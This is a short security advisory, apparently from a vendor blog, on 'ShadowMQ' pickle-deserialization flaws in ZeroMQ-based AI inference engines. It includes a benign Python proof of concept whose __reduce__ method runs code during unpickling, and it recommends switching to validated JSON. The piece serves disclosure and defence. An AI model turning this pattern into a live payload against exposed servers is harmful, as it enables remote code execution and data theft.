ShadowMQ Vulnerabilities: Over 30 Critical Flaws in Meta Llama, NVIDIA TensorRT-LLM, vLLM, and Other AI Inference Engines Enable Data Theft and Remote Code Execution - Rescana
Over 30 critical "ShadowMQ" vulnerabilities, stemming from insecure use of ZeroMQ's `recv_pyobj()` and Python `pickle` deserialization, affect leading AI inference engines including Meta Llama, NVIDIA TensorRT-LLM, and vLLM. The flaws enable remote code execution, data theft, and privilege escalation; several are tracked under CVEs such as CVE-2024-50050, and active exploitation has been observed.
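To see why this class of flaw is so severe, note that pyzmq's `recv_pyobj()` is documented as deserializing the received message with `pickle`, and `pickle.loads()` on attacker-controlled bytes executes code during deserialization. The following stdlib-only sketch models the pattern (no ZeroMQ socket is set up; the `MaliciousPayload` class and the `SHADOWMQ_POC` environment variable are illustrative names, not from the report):

```python
import os
import pickle


class MaliciousPayload:
    """Stands in for bytes an attacker sends to an exposed ZeroMQ socket."""

    def __reduce__(self):
        # Whatever __reduce__ returns is *called* during unpickling. A real
        # attacker would invoke os.system() or similar; here we only set an
        # environment variable as harmless proof of code execution.
        return (exec, ("import os; os.environ['SHADOWMQ_POC'] = 'pwned'",))


# Bytes as they would arrive over the network.
wire_bytes = pickle.dumps(MaliciousPayload())

# recv_pyobj() amounts to pickle.loads(socket.recv()), so this line models
# what a vulnerable inference server does on every received message:
pickle.loads(wire_bytes)

print(os.environ.get("SHADOWMQ_POC"))  # -> pwned: code ran before any check
```

The attacker's code runs before the application ever inspects the object, so no validation after the `recv_pyobj()` call can help. The usual mitigation is to exchange data rather than objects, for example schema-validated JSON via `recv_json()`, so that untrusted input can never carry executable payloads.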
Source: Original Report